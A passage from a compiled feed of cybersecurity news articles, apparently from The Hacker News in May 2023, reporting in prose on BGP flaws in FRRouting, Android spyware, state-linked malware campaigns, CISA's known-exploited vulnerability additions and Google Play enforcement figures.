"The DoS condition may be prolonged indefinitely by repeatedly sending malformed packets. The main root cause is the same vulnerable code pattern copied into several functions related to different stages of parsing OPEN messages."
A threat actor could spoof a valid IP address of a trusted BGP peer or exploit other flaws and misconfigurations to compromise a legitimate peer and then issue a specially-crafted unsolicited BGP OPEN message.
This is achieved by taking advantage of the fact that "FRRouting begins to process OPEN messages (e.g., decapsulating optional parameters) before it gets a chance to verify the BGP Identifier and ASN fields of the originating router."
Forescout has also made available a Python-based open source BGP Fuzzer tool that allows organizations to test the security of the BGP suites used internally as well as find new flaws in BGP implementations.
"Modern BGP implementations still have low-hanging fruits that can be abused by attackers," Forescout said. "To mitigate the risk of vulnerable BGP implementations, [...] the best recommendation is to patch network infrastructure devices as often as possible."
The findings come weeks after ESET found that secondhand routers previously used in business networking environments harbored sensitive data, including corporate credentials, VPN details, cryptographic keys, and other vital customer information.
"In the wrong hands, the data gleaned from the devices including customer data, router-to-router authentication keys, application lists, and much more is enough to launch a cyberattack," the Slovak cybersecurity firm said.
BouldSpy Android Spyware: Iranian Government's Alleged Tool for Spying on Minority Groups
3.5.23 Android The Hacker News
A new Android surveillanceware possibly used by the Iranian government has been used to spy on over 300 individuals belonging to minority groups.
The malware, dubbed BouldSpy, has been attributed with moderate confidence to the Law Enforcement Command of the Islamic Republic of Iran (FARAJA). Targeted victims include Iranian Kurds, Baluchis, Azeris, and Armenian Christian groups.
"The spyware may also have been used in efforts to counter and monitor illegal trafficking activity related to arms, drugs, and alcohol," Lookout said, based on exfiltrated data that contained photos of drugs, firearms, and official documents issued by FARAJA.
BouldSpy, like other Android malware families, abuses its access to Android's accessibility services and other intrusive permissions to harvest sensitive data such as web browser history, photos, contact lists, SMS logs, keystrokes, screenshots, clipboard content, microphone audio, and video call recordings.
It's worth pointing out that BouldSpy refers to the same Android malware that Cyble codenamed DAAM in its own analysis last month.
Evidence gathered so far points to BouldSpy being installed on targets' devices via physical access, potentially confiscated after detention. This theory is bolstered by the fact that the first locations gathered from victim devices are mostly concentrated around Iranian law enforcement establishments and border control posts.
The malware comes alongside a command-and-control (C2) panel to manage victim devices, not to mention create new malicious apps that masquerade as seemingly innocuous apps like benchmarking tools, currency converters, interest calculators, and the Psiphon censorship circumvention utility.
Other noteworthy features comprise its ability to run additional code sent from the C2 server, receive commands through SMS messages, and even disable battery management features to prevent the device from terminating the spyware.
It further incorporates an "unused and nonfunctional" ransomware component that borrows its implementation from an open source project called CryDroid, raising the possibility that it's being actively developed or is a false flag planted by the threat actor.
"Once installed, the spyware will seek to establish a network connection to its C2 server and exfiltrate any cached data from the victim's device to the server," Lookout researchers said. "BouldSpy represents yet another surveillance tool taking advantage of the personal nature of mobile devices."
LOBSHOT: A Stealthy, Financial Trojan and Info Stealer Delivered through Google Ads
3.5.23 Virus The Hacker News
In yet another instance of how threat actors are abusing Google Ads to serve malware, a threat actor has been observed leveraging the technique to deliver a new Windows-based financial trojan and information stealer called LOBSHOT.
"LOBSHOT continues to collect victims while staying under the radar," Elastic Security Labs researcher Daniel Stepanic said in an analysis published last week.
"One of LOBSHOT's core capabilities is around its hVNC (Hidden Virtual Network Computing) component. These kinds of modules allow for direct and unobserved access to the machine."
The American-Dutch company attributed the malware strain to a threat actor known as TA505 based on infrastructure historically connected to the group. TA505 is a financially motivated e-crime syndicate that overlaps with activity clusters tracked under the names Evil Corp, FIN11, and Indrik Spider.
The latest development is significant because it's a sign that TA505, which is associated with the Dridex banking trojan, is once again expanding its malware arsenal to perpetrate data theft and financial fraud.
LOBSHOT, with early samples dating back to July 2022, is distributed by means of rogue Google ads for legitimate tools like AnyDesk that are hosted on a network of lookalike landing pages maintained by the operators.
The malware incorporates dynamic import resolution (i.e., resolving the names of necessary Windows APIs at runtime), anti-emulation checks, and string obfuscation to evade detection by security software.
Once installed, it makes Windows Registry changes to set up persistence and siphons data from over 50 cryptocurrency wallet extensions present in web browsers like Google Chrome, Microsoft Edge, and Mozilla Firefox.
LOBSHOT's other notable features revolve around its ability to remotely access the compromised host via an hVNC module and stealthily perform actions on it without attracting the victim's attention.
"Threat groups are continuing to leverage malvertising techniques to masquerade legitimate software with backdoors like LOBSHOT," Stepanic said.
"These kinds of malware seem small, but end up packing significant functionality which helps threat actors move quickly during the initial access stages with fully interactive remote control capabilities."
The findings also underscore how an increasing number of adversaries are adopting malvertising and search engine optimization (SEO) poisoning as a technique to redirect users to fake websites and download trojanized installers of popular software.
According to data from eSentire, the threat actors behind GootLoader have been linked to a string of attacks targeting law firms and corporate legal departments in the U.S., Canada, the U.K., and Australia.
GootLoader, active since 2018 and which functions as an initial access-as-a-service operation for ransomware attacks, employs SEO poisoning to entice victims searching for agreements and contracts to infected WordPress blogs that point to links containing the malware.
Besides implementing geofencing to target victims in select regions, the attack chain is designed such that the malware can only be downloaded once per day from the hijacked sites in order to elude discovery by incident responders.
GootLoader's use of the IP address method to screen already hacked victims, eSentire found, could be used against it to preemptively block the end users' IP addresses and prevent organizations from potential infections.
North Korea's ScarCruft Deploys RokRAT Malware via LNK File Infection Chains
3.5.23 Virus The Hacker News
The North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default.
"RokRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate multi-stage infection chains," Check Point said in a new technical report.
"This is another representation of a major trend in the threat landscape, where APTs and cybercriminals alike attempt to overcome the blocking of macros from untrusted sources."
ScarCruft, also known by the names APT37, InkySquid, Nickel Foxcroft, Reaper, RedEyes, and Ricochet Chollima, is a threat group that almost exclusively targets South Korean individuals and entities as part of spear-phishing attacks designed to deliver an array of custom tools.
The adversarial collective, unlike the Lazarus Group or Kimsuky, is overseen by North Korea's Ministry of State Security (MSS), which is tasked with domestic counterespionage and overseas counterintelligence activities, per Mandiant.
The group's primary malware of choice is RokRAT (aka DOGCALL), which has since been adapted to other platforms such as macOS (CloudMensis) and Android (RambleOn), indicating that the backdoor is being actively developed and maintained.
RokRAT and its variants are equipped to carry out a wide range of activities like credential theft, data exfiltration, screenshot capture, system information gathering, command and shellcode execution, and file and directory management.
The collected information, some of which is stored in the form of MP3 files to cover its tracks, is sent back using cloud services like Dropbox, Microsoft OneDrive, pCloud, and Yandex Cloud in a bid to disguise the command-and-control (C2) communications as legitimate.
Other bespoke malware used by the group include, but not limited to, Chinotto, BLUELIGHT, GOLDBACKDOOR, Dolphin, and, most recently, M2RAT. It's also known to use commodity malware such as Amadey, a downloader that can receive commands from the attacker to download additional payloads, in a bid to confuse attribution.
The use of LNK files as decoys to activate the infection sequences was also highlighted by the AhnLab Security Emergency Response Center (ASEC) last week, with the files containing PowerShell commands that deploy the RokRAT malware.
While the change in modus operandi signals ScarCruft's endeavors to keep up with the shifting threat ecosystem, it has continued to leverage macro-based malicious Word documents as recently as April 2023 to drop the malware, mirroring a similar chain that was reported by Malwarebytes in January 2021.
Another attack wave observed at the beginning of November 2022, according to the Israeli cybersecurity company, employed ZIP archives incorporating LNK files to deploy the Amadey malware.
"[The LNK file] method can trigger an equally effective infection chain by a simple double click, one that is more reliable than n-day exploits or the Office macros which require additional clicks to launch," Check Point said.
"APT37 continues to pose a considerable threat, launching multiple campaigns across the platforms and significantly improving its malware delivery methods."
The findings come as Kaspersky disclosed a new Go-based malware developed by ScarCruft codenamed SidLevel that utilizes the cloud messaging service Ably as a C2 mechanism for the first time and comes with "extensive capabilities to steal sensitive information from victims."
"The group continues to target individuals related to North Korea, including novelists, academic students, and also business people who appear to send funds back to North Korea," the Russian cybersecurity firm noted in its APT Trends Report for Q1 2023.
Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected
3.5.23 Exploit The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The security vulnerabilities are as follows -
CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability
CVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability
CVE-2023-21839 (CVSS score: 7.5) - Oracle WebLogic Server Unspecified Vulnerability
CVE-2023-1389 concerns a case of command injection affecting TP-Link Archer AX-21 routers that could be exploited to achieve remote code execution. According to Trend Micro's Zero Day Initiative, the flaw has been put to use by threat actors associated with the Mirai botnet since April 11, 2023.
The second flaw to be added to the KEV catalog is CVE-2021-45046, a remote code execution affecting the Apache Log4j2 logging library that came to light in December 2021.
It's currently not clear how this specific vulnerability is being abused in the wild, although data gathered by GreyNoise shows evidence of exploitation attempts from as many as 74 unique IP addresses over the past 30 days. This, however, also includes CVE-2021-44228 (aka Log4Shell).
Completing the list is a high-severity bug in Oracle WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 that could allow unauthorized access to sensitive data. It was patched by the company as part of updates released in January 2023.
"Oracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server," CISA said.
While there exists proof-of-concept (PoC) exploits for the flaw, there do not appear to be any public reports of malicious exploitation.
Federal Civilian Executive Branch (FCEB) agencies are required to apply vendor-provided fixes by May 22, 2023, to secure their networks against these active threats.
The advisory also comes a little over a month after VulnCheck revealed that nearly four dozen security flaws that have likely been weaponized in the wild in 2022 are missing from the KEV catalog.
Of the 42 vulnerabilities, an overwhelming majority are related to exploitation by Mirai-like botnets (27), followed by ransomware gangs (6) and other threat actors (9).
New Decoy Dog Malware Toolkit Uncovered: Targeting Enterprise Networks
1.5.23 Virus The Hacker News
An analysis of over 70 billion DNS records has led to the discovery of a new sophisticated malware toolkit dubbed Decoy Dog targeting enterprise networks.
Decoy Dog, as the name implies, is evasive and employs techniques like strategic domain aging and DNS query dribbling, wherein a series of queries are transmitted to the command-and-control (C2) domains so as to not arouse any suspicion.
"Decoy Dog is a cohesive toolkit with a number of highly unusual characteristics that make it uniquely identifiable, particularly when examining its domains on a DNS level," Infoblox said in an advisory published late last month.
The cybersecurity firm, which identified the malware in early April 2023 following anomalous DNS beaconing activity, said its atypical characteristics allowed it to map additional domains that are part of the attack infrastructure.
That said, the usage of Decoy Dog in the wild is "very rare," with the DNS signature matching less than 0.0000027% of the 370 million active domains on the internet, according to the California-based company.
One of the chief components of the toolkit is Pupy RAT, an open source trojan that's delivered by means of a method called DNS tunneling, in which DNS queries and responses are used as a C2 for stealthily dropping payloads.
It's worth noting that the use of the cross-platform Pupy RAT has been linked to nation-state actors from China such as Earth Berberoka (aka GamblingPuppet) in the past, although there's no evidence to suggest the actor's involvement in this campaign.
Further investigation into Decoy Dog suggests that the operation had been set up at least a year prior to its discovery, with three distinct infrastructure configurations detected to date.
Another crucial aspect is the unusual DNS beaconing behavior associated with Decoy Dog domains, such that they adhere to a pattern of periodic, but infrequent, DNS requests so as to fly under the radar.
"Decoy Dog domains can be grouped together based on their shared registrars, name servers, IPs, and dynamic DNS providers," Infoblox said.
"Given the other commonalities between Decoy Dog domains, this is indicative of either one threat actor gradually evolving their tactics, or multiple threat actors deploying the same toolkit on different infrastructure."
Vietnamese Threat Actor Infects 500,000 Devices Using 'Malverposting' Tactics
1.5.23 Virus The Hacker News
A Vietnamese threat actor has been attributed as behind a "malverposting" campaign on social media platforms to infect over 500,000 devices worldwide over the past three months to deliver variants of information stealers such as S1deload Stealer and SYS01stealer.
Malverposting refers to the use of promoted social media posts on services like Facebook and Twitter to mass propagate malicious software and other security threats. The idea is to reach a broader audience by paying for ads to "amplify" their posts.
According to Guardio Labs, such attacks commence with the adversary creating new business profiles and hijacking already popular accounts to serve ads that claim to offer free adult-rated photo album downloads.
Within these ZIP archive files are purported images that are actually executable files, which, when clicked, activate the infection chain and ultimately deploy the stealer malware to siphon session cookies, account data, and other information.
The attack chain is highly effective as it creates a "vicious circle" wherein the information plundered using the stealer is used to create an ever-expanding army of hijacked Facebook bot accounts that are then used to push more sponsored posts, effectively scaling the scheme further.
To slip under the radar of Facebook, the threat actor has been found to pass off the newly generated business profile pages as photographer accounts. A majority of the infections have been reported in Australia, Canada, India, the U.K., and the U.S.
The method through which the PHP-based stealer is deployed is said to be constantly evolving to incorporate more detection evasion features, suggesting that the threat actor behind the campaign is actively refining and retooling their tactics in response to public disclosures.
"The malicious payload is quite sophisticated and varies all the time, introducing new evasive techniques," Guardio Labs security researcher Nati Tal said.
The findings come as Group-IB revealed details of an ongoing phishing operation that's aimed at Facebook users by tricking them to enter their credentials on fake copycat sites designed to steal their account credentials and take over the profiles.
In a related development, Malwarebytes unearthed a malvertising campaign that has been found to trick users searching for games and food recipes on Google to serve malicious ads that redirect them to fake websites created on Weebly with the goal of conducting a tech support scam.
APT28 Targets Ukrainian Government Entities with Fake "Windows Update" Emails
1.5.23 APT The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country.
The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.
The email messages come with the subject line "Windows Update" and purportedly contain instructions in the Ukrainian language to run a PowerShell command under the pretext of security updates.
Running the script loads and executes a next-stage PowerShell script that's designed to collect basic system information through commands like tasklist and systeminfo, and exfiltrate the details via an HTTP request to a Mocky API.
To trick the targets into running the command, the emails impersonated system administrators of the targeted government entities using fake Microsoft Outlook email accounts created with the employees' real names and initials.
CERT-UA is recommending that organizations restrict users' ability to run PowerShell scripts and monitor network connections to the Mocky API.
The disclosure comes weeks after the APT28 was tied to attacks exploiting now-patched security flaws in networking equipment to conduct reconnaissance and deploy malware against select targets.
Google's Threat Analysis Group (TAG), in an advisory published last month, detailed a credential harvesting operation carried out by the threat actor to redirect visitors of Ukrainian government websites to phishing domains.
Russian-based hacking crews have also been linked to the exploitation of a critical privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) in intrusions directed against the government, transportation, energy, and military sectors in Europe.
The development also comes as Fortinet FortiGuard Labs uncovered a multi-stage phishing attack that leverages a macro-laced Word document supposedly from Ukraine's Energoatom as a lure to deliver the open source Havoc post-exploitation framework.
"It remains highly likely that Russian intelligence, military, and law enforcement services have a longstanding, tacit understanding with cybercriminal threat actors," cybersecurity firm Recorded Future said in a report earlier this year.
"In some cases, it is almost certain that these agencies maintain an established and systematic relationship with cybercriminal threat actors, either by indirect collaboration or via recruitment."
Google Blocks 1.43 Million Malicious Apps, Bans 173,000 Bad Accounts in 2022
1.5.23 Android The Hacker News
Google disclosed that its improved security features and app review processes helped it block 1.43 million bad apps from being published to the Play Store in 2022.
In addition, the company said it banned 173,000 bad accounts and fended off over $2 billion in fraudulent and abusive transactions through developer-facing features like Voided Purchases API, Obfuscated Account ID, and Play Integrity API.
The addition of identity verification methods such as phone number and email address to join Google Play contributed to a reduction in accounts used to publish apps that go against its policies, Google pointed out.
The search behemoth further said it "prevented about 500K submitted apps from unnecessarily accessing sensitive permissions over the past 3 years."
"In 2022, the App Security Improvements program helped developers fix ~500K security weaknesses affecting ~300K apps with a combined install base of approximately 250B installs," it noted.
In contrast, Google blocked 1.2 million policy-violating apps from being published and banned 190,000 bad accounts in 2021.
The development comes weeks after Google enacted a new data deletion policy that requires app developers to offer a "readily discoverable option" to users from both within an app and outside of it.
Despite these efforts from Google, cybercriminals are continuing to find ways around the app storefront's security protections and publish malicious and adware apps.
Case in point, McAfee's Mobile Research Team discovered 38 games masquerading as Minecraft and which have been installed by no less than 35 million users worldwide, primarily located in the U.S., Canada, South Korea, and Brazil.
Android Security
These gaming apps, while offering the promised functionality, have been found to incorporate the HiddenAds malware to stealthily load ads in the background to generate illicit revenue for its operators.
Some of the most downloaded apps are as follows -
Block Box Master Diamond (com.good.robo.game.builder.craft.block)
Craft Sword Mini Fun (com.craft.world.fairy.fun.everyday.block)
Block Box Skyland Sword (com.skyland.pet.realm.block.rain.craft)
Craft Monster Crazy Sword (com.skyland.fun.block.game.monster.craft)
Block Pro Forrest Diamond (com.monster.craft.block.fun.robo.fairy)
"One of the most accessible content for young people using mobile devices is games," McAfee said. "Malware authors are also aware of this and try to hide their malicious features inside games."
Complicating the problem is the surge in Android banking malware that can be weaponized by threat actors to gain access to victim devices and harvest personal information.
Another emerging trend is the use of binding services to trojanize legitimate applications and conceal a rogue APK payload. This technique has been adopted by bad actors to distribute an Android botnet dubbed DAAM, Cyble said.
The malware, once installed, establishes connections with a remote server to perform a wide range of nefarious actions, including acting as ransomware by encrypting files stored in the devices using a password retrieved from the server.
DAAM also abuses Android's accessibility services to monitor users' activity, thereby allowing it to log keystrokes, record VoIP calls from instant messaging apps, collect browser history, call logs, photos, screenshots, and SMS messages, run arbitrary code, and open phishing URLs.
"Malware authors often leverage genuine applications to distribute malicious code to avoid suspicion," the cybersecurity firm said in an analysis published last month.
Android Security
The findings also follow an advisory from CloudSEK, which discovered that several popular Android applications like Canva, LinkedIn, Strava, Telegram, and WhatsApp do not invalidate or revalidate session cookies after app data is transferred from one device to another.
While this attack scenario requires an adversary to have physical access to a target's phone, it could allow for account takeover and grant an adversary unauthorized access to confidential data.
To mitigate such threats, it's advised to enable two-factor authentication (2FA) to add an extra layer of account protection, scrutinize app permissions, secure devices with a password, and avoid leaving them unattended in public places.